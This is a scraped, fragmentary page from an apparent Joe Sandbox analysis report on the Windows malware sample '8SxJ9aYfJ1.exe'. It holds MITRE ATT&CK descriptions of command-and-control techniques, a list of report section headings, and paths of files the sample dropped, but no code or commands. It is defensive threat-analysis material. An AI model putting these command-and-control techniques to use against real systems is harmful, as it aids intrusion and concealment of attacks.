Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 8SxJ9aYfJ1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8SxJ9aYfJ1.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TwkYThKVQVaYn.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3mxryp3y.5al.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a00tl3fx.jqt.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewl4kpeb.24q.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_omi1c0qo.fry.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qw1jfzpe.bhr.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qwr5gksb.tgx.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmzwvhig.00d.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0i5n4z3.fh4.ps1

C:\Users\user\AppData\Local\Temp\s822635O8R95

Windows Analysis Report
8SxJ9aYfJ1.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre